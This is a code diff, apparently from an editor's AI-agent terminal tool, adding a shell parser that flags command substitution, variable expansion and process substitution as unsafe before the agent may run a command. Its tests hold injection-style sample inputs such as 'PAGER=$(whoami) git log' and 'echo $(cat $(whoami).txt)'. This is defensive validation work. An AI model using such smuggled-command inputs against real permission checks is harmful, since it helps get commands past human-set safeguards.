async fn test_rejects_nested_command_substitution(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + assert_rejected_before_terminal_creation("echo $(cat $(whoami).txt)", cx).await; + } + + #[gpui::test] + async fn test_allow_all_terminal_specific_default_with_empty_patterns( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Allow), + always_allow: vec![], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "echo $(whoami)".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "terminal-specific allow-all should bypass substitution rejection" + ); + + let result = task + .await + .expect("terminal-specific allow-all should let the command proceed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created exactly once" + ); + assert!( + !result.contains("could not be approved"), + "unexpected rejection output: {result}" + ); + } + + #[gpui::test] + async fn test_env_prefix_pattern_rejects_different_value(cx: &mut gpui::TestAppContext) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^PAGER=blah\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, _rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=other git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let error = task + .await + .expect_err("different env-var value should not match allow pattern"); + assert!( + error.contains("could not be approved") + || error.contains("denied") + || error.contains("disabled"), + "expected denial for mismatched env value, got: {error}" + ); + assert!( + environment.terminal_creation_count() == 0, + "terminal should not be created for non-matching env value" + ); + } + + #[gpui::test] + async fn test_env_prefix_multiple_assignments_preserved_in_order( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new(r"^A=1\s+B=2\s+git\s+log(\s|$)", false) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "A=1 B=2 git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "multi-assignment pattern should match and produce terminal content" + ); + + let result = task + .await + .expect("multi-assignment command matching pattern should be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for matching multi-assignment command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } + + #[gpui::test] + async fn test_env_prefix_quoted_whitespace_value_matches_only_with_quotes_in_pattern( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + let fs = fs::FakeFs::new(cx.executor()); + fs.insert_tree("/root", serde_json::json!({})).await; + let project = project::Project::test(fs, ["/root".as_ref()], cx).await; + + let environment = std::rc::Rc::new(cx.update(|cx| { + crate::tests::FakeThreadEnvironment::default().with_terminal( + crate::tests::FakeTerminalHandle::new_with_immediate_exit(cx, 0), + ) + })); + + cx.update(|cx| { + let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); + settings.tool_permissions.default = settings::ToolPermissionMode::Deny; + settings.tool_permissions.tools.insert( + TerminalTool::NAME.into(), + agent_settings::ToolRules { + default: Some(settings::ToolPermissionMode::Deny), + always_allow: vec![ + agent_settings::CompiledRegex::new( + r#"^PAGER="less\ -R"\s+git\s+log(\s|$)"#, + false, + ) + .unwrap(), + ], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + agent_settings::AgentSettings::override_global(settings, cx); + }); + + #[allow(clippy::arc_with_non_send_sync)] + let tool = std::sync::Arc::new(TerminalTool::new(project, environment.clone())); + let (event_stream, mut rx) = crate::ToolCallEventStream::test(); + + let task = cx.update(|cx| { + tool.run( + crate::ToolInput::resolved(TerminalToolInput { + command: "PAGER=\"less -R\" git log".to_string(), + cd: "root".to_string(), + timeout_ms: None, + }), + event_stream, + cx, + ) + }); + + let update = rx.expect_update_fields().await; + assert!( + update.content.iter().any(|blocks| { + blocks + .iter() + .any(|content| matches!(content, acp::ToolCallContent::Terminal(_))) + }), + "quoted whitespace value should match pattern with quoted form" + ); + + let result = task + .await + .expect("quoted whitespace env value matching pattern should be allowed"); + assert!( + environment.terminal_creation_count() == 1, + "terminal should be created for matching quoted-value command" + ); + assert!( + result.contains("command output") || result.contains("Command executed successfully."), + "unexpected terminal result: {result}" + ); + } } diff --git a/crates/shell_command_parser/src/shell_command_parser.rs b/crates/shell_command_parser/src/shell_command_parser.rs index acfd656787c301d9f7ad61e6a14a052b3bc2924c..2ab42dd36bb10c3ed4a624d4a7196174cff6a141 100644 --- a/crates/shell_command_parser/src/shell_command_parser.rs +++ b/crates/shell_command_parser/src/shell_command_parser.rs @@ -1,8 +1,25 @@ use brush_parser::ast; +use brush_parser::ast::SourceLocation; use brush_parser::word::WordPiece; use brush_parser::{Parser, ParserOptions, SourceInfo}; use std::io::BufReader; +#[derive(Debug, Clone, PartialEq, Eq)] +pub struct TerminalCommandPrefix { + pub normalized: String, + pub display: String, + pub tokens: Vec, + pub command: String, + pub subcommand: Option, +} + +#[derive(Debug, Clone, PartialEq, Eq)] +pub enum TerminalCommandValidation { + Safe, + Unsafe, + Unsupported, +} + pub fn extract_commands(command: &str) -> Option> { let reader = BufReader::new(command.as_bytes()); let options = ParserOptions::default(); @@ -17,6 +34,444 @@ pub fn extract_commands(command: &str) -> Option> { Some(commands) } +pub fn extract_terminal_command_prefix(command: &str) -> Option { + let reader = BufReader::new(command.as_bytes()); + let options = ParserOptions::default(); + let source_info = SourceInfo::default(); + let mut parser = Parser::new(reader, &options, &source_info); + + let program = parser.parse_program().ok()?; + let simple_command = first_simple_command(&program)?; + + let mut normalized_tokens = Vec::new(); + let mut display_start = None; + let mut display_end = None; + + if let Some(prefix) = &simple_command.prefix { + for item in &prefix.0 { + if let ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) = item { + match normalize_assignment_for_command_prefix(assignment, word)? { + NormalizedAssignment::Included(normalized_assignment) => { + normalized_tokens.push(normalized_assignment); + update_display_bounds(&mut display_start, &mut display_end, word); + } + NormalizedAssignment::Skipped => {} + } + } + } + } + + let command_word = simple_command.word_or_name.as_ref()?; + let command_name = normalize_word(command_word)?; + normalized_tokens.push(command_name.clone()); + update_display_bounds(&mut display_start, &mut display_end, command_word); + + let mut subcommand = None; + if let Some(suffix) = &simple_command.suffix { + for item in &suffix.0 { + match item { + ast::CommandPrefixOrSuffixItem::IoRedirect(_) => continue, + ast::CommandPrefixOrSuffixItem::Word(word) => { + let normalized_word = normalize_word(word)?; + if !normalized_word.starts_with('-') { + subcommand = Some(normalized_word.clone()); + normalized_tokens.push(normalized_word); + update_display_bounds(&mut display_start, &mut display_end, word); + } + break; + } + _ => break, + } + } + } + + let start = display_start?; + let end = display_end?; + let display = command.get(start..end)?.to_string(); + + Some(TerminalCommandPrefix { + normalized: normalized_tokens.join(" "), + display, + tokens: normalized_tokens, + command: command_name, + subcommand, + }) +} + +pub fn validate_terminal_command(command: &str) -> TerminalCommandValidation { + let reader = BufReader::new(command.as_bytes()); + let options = ParserOptions::default(); + let source_info = SourceInfo::default(); + let mut parser = Parser::new(reader, &options, &source_info); + + let program = match parser.parse_program() { + Ok(program) => program, + Err(_) => return TerminalCommandValidation::Unsupported, + }; + + match program_validation(&program) { + TerminalProgramValidation::Safe => TerminalCommandValidation::Safe, + TerminalProgramValidation::Unsafe => TerminalCommandValidation::Unsafe, + TerminalProgramValidation::Unsupported => TerminalCommandValidation::Unsupported, + } +} + +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +enum TerminalProgramValidation { + Safe, + Unsafe, + Unsupported, +} + +fn first_simple_command(program: &ast::Program) -> Option<&ast::SimpleCommand> { + let complete_command = program.complete_commands.first()?; + let compound_list_item = complete_command.0.first()?; + let command = compound_list_item.0.first.seq.first()?; + + match command { + ast::Command::Simple(simple_command) => Some(simple_command), + _ => None, + } +} + +fn update_display_bounds(start: &mut Option, end: &mut Option, word: &ast::Word) { + if let Some(location) = word.location() { + let word_start = location.start.index; + let word_end = location.end.index; + *start = Some(start.map_or(word_start, |current| current.min(word_start))); + *end = Some(end.map_or(word_end, |current| current.max(word_end))); + } +} + +enum NormalizedAssignment { + Included(String), + Skipped, +} + +fn normalize_assignment_for_command_prefix( + assignment: &ast::Assignment, + word: &ast::Word, +) -> Option { + let operator = if assignment.append { "+=" } else { "=" }; + let assignment_prefix = format!("{}{}", assignment.name, operator); + + match &assignment.value { + ast::AssignmentValue::Scalar(value) => { + let normalized_value = normalize_word(value)?; + let raw_value = word.value.strip_prefix(&assignment_prefix)?; + let rendered_value = if shell_value_requires_quoting(&normalized_value) { + raw_value.to_string() + } else { + normalized_value + }; + + Some(NormalizedAssignment::Included(format!( + "{assignment_prefix}{rendered_value}" + ))) + } + ast::AssignmentValue::Array(_) => Some(NormalizedAssignment::Skipped), + } +} + +fn shell_value_requires_quoting(value: &str) -> bool { + value.chars().any(|character| { + character.is_whitespace() + || !matches!( + character, + 'a'..='z' + | 'A'..='Z' + | '0'..='9' + | '_' + | '@' + | '%' + | '+' + | '=' + | ':' + | ',' + | '.' + | '/' + | '-' + ) + }) +} + +fn program_validation(program: &ast::Program) -> TerminalProgramValidation { + combine_validations( + program + .complete_commands + .iter() + .map(compound_list_validation), + ) +} + +fn compound_list_validation(compound_list: &ast::CompoundList) -> TerminalProgramValidation { + combine_validations( + compound_list + .0 + .iter() + .map(|item| and_or_list_validation(&item.0)), + ) +} + +fn and_or_list_validation(and_or_list: &ast::AndOrList) -> TerminalProgramValidation { + combine_validations( + std::iter::once(pipeline_validation(&and_or_list.first)).chain( + and_or_list.additional.iter().map(|and_or| match and_or { + ast::AndOr::And(pipeline) | ast::AndOr::Or(pipeline) => { + pipeline_validation(pipeline) + } + }), + ), + ) +} + +fn pipeline_validation(pipeline: &ast::Pipeline) -> TerminalProgramValidation { + combine_validations(pipeline.seq.iter().map(command_validation)) +} + +fn command_validation(command: &ast::Command) -> TerminalProgramValidation { + match command { + ast::Command::Simple(simple_command) => simple_command_validation(simple_command), + ast::Command::Compound(compound_command, redirect_list) => combine_validations( + std::iter::once(compound_command_validation(compound_command)) + .chain(redirect_list.iter().map(redirect_list_validation)), + ), + ast::Command::Function(function_definition) => { + function_body_validation(&function_definition.body) + } + ast::Command::ExtendedTest(test_expr) => extended_test_expr_validation(test_expr), + } +} + +fn simple_command_validation(simple_command: &ast::SimpleCommand) -> TerminalProgramValidation { + combine_validations( + simple_command + .prefix + .iter() + .map(command_prefix_validation) + .chain(simple_command.word_or_name.iter().map(word_validation)) + .chain(simple_command.suffix.iter().map(command_suffix_validation)), + ) +} + +fn command_prefix_validation(prefix: &ast::CommandPrefix) -> TerminalProgramValidation { + combine_validations(prefix.0.iter().map(prefix_or_suffix_item_validation)) +} + +fn command_suffix_validation(suffix: &ast::CommandSuffix) -> TerminalProgramValidation { + combine_validations(suffix.0.iter().map(prefix_or_suffix_item_validation)) +} + +fn prefix_or_suffix_item_validation( + item: &ast::CommandPrefixOrSuffixItem, +) -> TerminalProgramValidation { + match item { + ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) => io_redirect_validation(redirect), + ast::CommandPrefixOrSuffixItem::Word(word) => word_validation(word), + ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => { + combine_validations([assignment_validation(assignment), word_validation(word)]) + } + ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => { + TerminalProgramValidation::Unsafe + } + } +} + +fn io_redirect_validation(redirect: &ast::IoRedirect) -> TerminalProgramValidation { + match redirect { + ast::IoRedirect::File(_, _, target) => match target { + ast::IoFileRedirectTarget::Filename(word) => word_validation(word), + ast::IoFileRedirectTarget::ProcessSubstitution(_, _) => { + TerminalProgramValidation::Unsafe + } + _ => TerminalProgramValidation::Safe, + }, + ast::IoRedirect::HereDocument(_, here_doc) => { + if here_doc.requires_expansion { + word_validation(&here_doc.doc) + } else { + TerminalProgramValidation::Safe + } + } + ast::IoRedirect::HereString(_, word) | ast::IoRedirect::OutputAndError(word, _) => { + word_validation(word) + } + } +} + +fn assignment_validation(assignment: &ast::Assignment) -> TerminalProgramValidation { + match &assignment.value { + ast::AssignmentValue::Scalar(word) => word_validation(word), + ast::AssignmentValue::Array(words) => { + combine_validations(words.iter().flat_map(|(key, value)| { + key.iter() + .map(word_validation) + .chain(std::iter::once(word_validation(value))) + })) + } + } +} + +fn word_validation(word: &ast::Word) -> TerminalProgramValidation { + let options = ParserOptions::default(); + let pieces = match brush_parser::word::parse(&word.value, &options) { + Ok(pieces) => pieces, + Err(_) => return TerminalProgramValidation::Unsupported, + }; + + combine_validations( + pieces + .iter() + .map(|piece_with_source| word_piece_validation(&piece_with_source.piece)), + ) +} + +fn word_piece_validation(piece: &WordPiece) -> TerminalProgramValidation { + match piece { + WordPiece::Text(_) + | WordPiece::SingleQuotedText(_) + | WordPiece::AnsiCQuotedText(_) + | WordPiece::EscapeSequence(_) + | WordPiece::TildePrefix(_) => TerminalProgramValidation::Safe, + WordPiece::DoubleQuotedSequence(pieces) + | WordPiece::GettextDoubleQuotedSequence(pieces) => combine_validations( + pieces + .iter() + .map(|inner| word_piece_validation(&inner.piece)), + ), + WordPiece::ParameterExpansion(_) | WordPiece::ArithmeticExpression(_) => { + TerminalProgramValidation::Unsafe + } + WordPiece::CommandSubstitution(command) + | WordPiece::BackquotedCommandSubstitution(command) => { + let reader = BufReader::new(command.as_bytes()); + let options = ParserOptions::default(); + let source_info = SourceInfo::default(); + let mut parser = Parser::new(reader, &options, &source_info); + + match parser.parse_program() { + Ok(_) => TerminalProgramValidation::Unsafe, + Err(_) => TerminalProgramValidation::Unsupported, + } + } + } +} + +fn compound_command_validation( + compound_command: &ast::CompoundCommand, +) -> TerminalProgramValidation { + match compound_command { + ast::CompoundCommand::BraceGroup(brace_group) => { + compound_list_validation(&brace_group.list) + } + ast::CompoundCommand::Subshell(subshell) => compound_list_validation(&subshell.list), + ast::CompoundCommand::ForClause(for_clause) => combine_validations( + for_clause + .values + .iter() + .flat_map(|values| values.iter().map(word_validation)) + .chain(std::iter::once(do_group_validation(&for_clause.body))), + ), + ast::CompoundCommand::CaseClause(case_clause) => combine_validations( + std::iter::once(word_validation(&case_clause.value)) + .chain( + case_clause + .cases + .iter() + .flat_map(|item| item.cmd.iter().map(compound_list_validation)), + ) + .chain( + case_clause + .cases + .iter() + .flat_map(|item| item.patterns.iter().map(word_validation)), + ), + ), + ast::CompoundCommand::IfClause(if_clause) => combine_validations( + std::iter::once(compound_list_validation(&if_clause.condition)) + .chain(std::iter::once(compound_list_validation(&if_clause.then))) + .chain(if_clause.elses.iter().flat_map(|elses| { + elses.iter().flat_map(|else_item| { + else_item + .condition + .iter() + .map(compound_list_validation) + .chain(std::iter::once(compound_list_validation(&else_item.body))) + }) + })), + ), + ast::CompoundCommand::WhileClause(while_clause) + | ast::CompoundCommand::UntilClause(while_clause) => combine_validations([ + compound_list_validation(&while_clause.0), + do_group_validation(&while_clause.1), + ]), + ast::CompoundCommand::ArithmeticForClause(_) => TerminalProgramValidation::Unsafe, + ast::CompoundCommand::Arithmetic(_) => TerminalProgramValidation::Unsafe, + } +} + +fn do_group_validation(do_group: &ast::DoGroupCommand) -> TerminalProgramValidation { + compound_list_validation(&do_group.list) +} + +fn function_body_validation(function_body: &ast::FunctionBody) -> TerminalProgramValidation { + combine_validations( + std::iter::once(compound_command_validation(&function_body.0)) + .chain(function_body.1.iter().map(redirect_list_validation)), + ) +} + +fn redirect_list_validation(redirect_list: &ast::RedirectList) -> TerminalProgramValidation { + combine_validations(redirect_list.0.iter().map(io_redirect_validation)) +} + +fn extended_test_expr_validation( + test_expr: &ast::ExtendedTestExprCommand, +) -> TerminalProgramValidation { + extended_test_expr_inner_validation(&test_expr.expr) +} + +fn extended_test_expr_inner_validation(expr: &ast::ExtendedTestExpr) -> TerminalProgramValidation { + match expr { + ast::ExtendedTestExpr::Not(inner) | ast::ExtendedTestExpr::Parenthesized(inner) => { + extended_test_expr_inner_validation(inner) + } + ast::ExtendedTestExpr::And(left, right) | ast::ExtendedTestExpr::Or(left, right) => { + combine_validations([ + extended_test_expr_inner_validation(left), + extended_test_expr_inner_validation(right), + ]) + } + ast::ExtendedTestExpr::UnaryTest(_, word) => word_validation(word), + ast::ExtendedTestExpr::BinaryTest(_, left, right) => { + combine_validations([word_validation(left), word_validation(right)]) + } + } +} + +fn combine_validations( + validations: impl IntoIterator, +) -> TerminalProgramValidation { + let mut saw_unsafe = false; + let mut saw_unsupported = false; + + for validation in validations { + match validation { + TerminalProgramValidation::Unsupported => saw_unsupported = true, + TerminalProgramValidation::Unsafe => saw_unsafe = true, + TerminalProgramValidation::Safe => {} + } + } + + if saw_unsafe { + TerminalProgramValidation::Unsafe + } else if saw_unsupported { + TerminalProgramValidation::Unsupported + } else { + TerminalProgramValidation::Safe + } +} + fn extract_commands_from_program(program: &ast::Program, commands: &mut Vec) -> Option<()> { for complete_command in &program.complete_commands { extract_commands_from_compound_list(complete_command, commands)?; @@ -117,12 +572,26 @@ fn extract_commands_from_simple_command( if let Some(prefix) = &simple_command.prefix { for item in &prefix.0 { - if let ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) = item { - match normalize_io_redirect(redirect) { - Some(RedirectNormalization::Normalized(s)) => redirects.push(s), - Some(RedirectNormalization::Skip) => {} - None => return None, + match item { + ast::CommandPrefixOrSuffixItem::IoRedirect(redirect) => { + match normalize_io_redirect(redirect) { + Some(RedirectNormalization::Normalized(s)) => redirects.push(s), + Some(RedirectNormalization::Skip) => {} + None => return None, + } + } + ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => { + match normalize_assignment_for_command_prefix(assignment, word)? { + NormalizedAssignment::Included(normalized_assignment) => { + words.push(normalized_assignment); + } + NormalizedAssignment::Skipped => {} + } + } + ast::CommandPrefixOrSuffixItem::Word(word) => { + words.push(normalize_word(word)?); } + ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => return None, } } } @@ -142,7 +611,15 @@ fn extract_commands_from_simple_command( None => return None, } } - _ => {} + ast::CommandPrefixOrSuffixItem::AssignmentWord(assignment, word) => { + match normalize_assignment_for_command_prefix(assignment, word)? { + NormalizedAssignment::Included(normalized_assignment) => { + words.push(normalized_assignment); + } + NormalizedAssignment::Skipped => {} + } + } + ast::CommandPrefixOrSuffixItem::ProcessSubstitution(_, _) => {} } } } @@ -1061,4 +1538,220 @@ mod tests { let commands = extract_commands("cmd > /tmp/out 2>/dev/null").expect("parse failed"); assert_eq!(commands, vec!["cmd", "> /tmp/out"]); } + + #[test] + fn test_scalar_env_var_prefix_included_in_extracted_command() { + let commands = extract_commands("PAGER=blah git status").expect("parse failed"); + assert_eq!(commands, vec!["PAGER=blah git status"]); + } + + #[test] + fn test_multiple_scalar_assignments_preserved_in_order() { + let commands = extract_commands("A=1 B=2 git log").expect("parse failed"); + assert_eq!(commands, vec!["A=1 B=2 git log"]); + } + + #[test] + fn test_assignment_quoting_dropped_when_safe() { + let commands = extract_commands("PAGER='curl' git log").expect("parse failed"); + assert_eq!(commands, vec!["PAGER=curl git log"]); + } + + #[test] + fn test_assignment_quoting_preserved_for_whitespace() { + let commands = extract_commands("PAGER='less -R' git log").expect("parse failed"); + assert_eq!(commands, vec!["PAGER='less -R' git log"]); + } + + #[test] + fn test_assignment_quoting_preserved_for_semicolon() { + let commands = extract_commands("PAGER='a;b' git log").expect("parse failed"); + assert_eq!(commands, vec!["PAGER='a;b' git log"]); + } + + #[test] + fn test_array_assignments_ignored_for_prefix_matching_output() { + let commands = extract_commands("FOO=(a b) git status").expect("parse failed"); + assert_eq!(commands, vec!["git status"]); + } + + #[test] + fn test_extract_terminal_command_prefix_includes_env_var_prefix_and_subcommand() { + let prefix = extract_terminal_command_prefix("PAGER=blah git log --oneline") + .expect("expected terminal command prefix"); + + assert_eq!( + prefix, + TerminalCommandPrefix { + normalized: "PAGER=blah git log".to_string(), + display: "PAGER=blah git log".to_string(), + tokens: vec![ + "PAGER=blah".to_string(), + "git".to_string(), + "log".to_string(), + ], + command: "git".to_string(), + subcommand: Some("log".to_string()), + } + ); + } + + #[test] + fn test_extract_terminal_command_prefix_preserves_required_assignment_quotes_in_display_and_normalized() + { + let prefix = extract_terminal_command_prefix("PAGER='less -R' git log") + .expect("expected terminal command prefix"); + + assert_eq!( + prefix, + TerminalCommandPrefix { + normalized: "PAGER='less -R' git log".to_string(), + display: "PAGER='less -R' git log".to_string(), + tokens: vec![ + "PAGER='less -R'".to_string(), + "git".to_string(), + "log".to_string(), + ], + command: "git".to_string(), + subcommand: Some("log".to_string()), + } + ); + } + + #[test] + fn test_extract_terminal_command_prefix_skips_redirects_before_subcommand() { + let prefix = extract_terminal_command_prefix("git 2>/dev/null log --oneline") + .expect("expected terminal command prefix"); + + assert_eq!( + prefix, + TerminalCommandPrefix { + normalized: "git log".to_string(), + display: "git 2>/dev/null log".to_string(), + tokens: vec!["git".to_string(), "log".to_string()], + command: "git".to_string(), + subcommand: Some("log".to_string()), + } + ); + } + + #[test] + fn test_validate_terminal_command_rejects_parameter_expansion() { + assert_eq!( + validate_terminal_command("echo $HOME"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_braced_parameter_expansion() { + assert_eq!( + validate_terminal_command("echo ${HOME}"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_special_parameters() { + assert_eq!( + validate_terminal_command("echo $?"), + TerminalCommandValidation::Unsafe + ); + assert_eq!( + validate_terminal_command("echo $$"), + TerminalCommandValidation::Unsafe + ); + assert_eq!( + validate_terminal_command("echo $@"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_command_substitution() { + assert_eq!( + validate_terminal_command("echo $(whoami)"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_backticks() { + assert_eq!( + validate_terminal_command("echo `whoami`"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_arithmetic_expansion() { + assert_eq!( + validate_terminal_command("echo $((1 + 1))"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_process_substitution() { + assert_eq!( + validate_terminal_command("cat <(ls)"), + TerminalCommandValidation::Unsafe + ); + assert_eq!( + validate_terminal_command("ls >(cat)"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_forbidden_constructs_in_env_var_assignments() { + assert_eq!( + validate_terminal_command("PAGER=$HOME git log"), + TerminalCommandValidation::Unsafe + ); + assert_eq!( + validate_terminal_command("PAGER=$(whoami) git log"), + TerminalCommandValidation::Unsafe + ); + } + + #[test] + fn test_validate_terminal_command_returns_unsupported_for_parse_failure() { + assert_eq!( + validate_terminal_command("echo $(ls &&)"), + TerminalCommandValidation::Unsupported + ); + } + + #[test] + fn test_validate_terminal_command_rejects_substitution_in_case_pattern() { + assert_ne!( + validate_terminal_command("case x in $(echo y)) echo z;; esac"), + TerminalCommandValidation::Safe + ); + } + + #[test] + fn test_validate_terminal_command_safe_case_clause_without_substitutions() { + assert_eq!( + validate_terminal_command("case x in foo) echo hello;; esac"), + TerminalCommandValidation::Safe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_substitution_in_arithmetic_for_clause() { + assert_ne!( + validate_terminal_command("for ((i=$(echo 0); i<3; i++)); do echo hello; done"), + TerminalCommandValidation::Safe + ); + } + + #[test] + fn test_validate_terminal_command_rejects_arithmetic_for_clause_unconditionally() { + assert_eq!( + validate_terminal_command("for ((i=0; i<3; i++)); do echo hello; done"), + TerminalCommandValidation::Unsafe + ); + } }